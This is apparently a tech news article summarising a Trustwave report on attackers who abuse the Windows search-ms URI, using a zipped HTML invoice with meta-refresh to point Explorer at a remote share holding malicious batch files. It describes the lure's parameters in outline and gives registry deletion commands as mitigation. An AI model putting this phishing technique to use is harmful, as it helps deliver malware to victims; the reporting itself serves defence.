1. Home
  2. >
  3. Industry
  4. >

Abuse of Windows Search Protocol to Spread Malware

By:Emma

TapTechNews, on June 13th, it was reported that the cybersecurity company Trustwave posted a blog on June 11th, stating that there are attackers abusing the Windows Search protocol (search-ms URI) by pushing batch files hosted on remote servers to achieve the purpose of spreading malicious software.

Abuse of Windows Search Protocol to Spread Malware_0

The Windows Search protocol is a Uniform Resource Identifier (URI), and applications can open Windows Explorer by invoking it and perform a search using specific parameters.

Although most Windows searches will look at the index of the local device, it is also possible to force Windows Search to query file shares on remote hosts and use a custom title for the search window.

TapTechNews quoted the Trustwave report, and there is already evidence that hackers have achieved the purpose of distributing malicious software by abusing the Windows Search protocol.

Trustwave noticed a malicious email that contained an HTML attachment disguised as an invoice document, which was placed in a small ZIP archive. ZIP helps to avoid security/AV scanners as these scanners may not be able to parse malicious content in archives.

Abuse of Windows Search Protocol to Spread Malware_1

The HTML file uses the <meta http-equiv=refresh> tag to make the browser automatically open the malicious URL when opening the HTML document.

Abuse of Windows Search Protocol to Spread Malware_2

If the meta-refresh fails due to browser settings blocking the redirect or other reasons, as a fallback mechanism, the anchor tag (anchor tag) provides a clickable link pointing to the malicious URL, but this requires user participation.

Abuse of Windows Search Protocol to Spread Malware_3

Attackers execute the search on the remote host through the following parameters:

Query: Search for items marked INVOICE.

Crumb: Specify the search area and point to the malicious server through Cloudflare.

Displayname: Rename the search display as Download, to imitate the legitimate interface.

Location: Use Cloudflare's tunnel service to mask the server and display the remote resource as a local file to make it look legitimate.

Abuse of Windows Search Protocol to Spread Malware_4

In order to prevent this kind of threat, Trustwave suggests executing the following commands to delete the registry entries related to the search-ms/searchURI protocol:

reg delete HKEY_CLASSES_ROOT\search /freg delete HKEY_CLASSES_ROOT\search-ms /f

Windows Search Protocol malware attackers Trustwave

Likes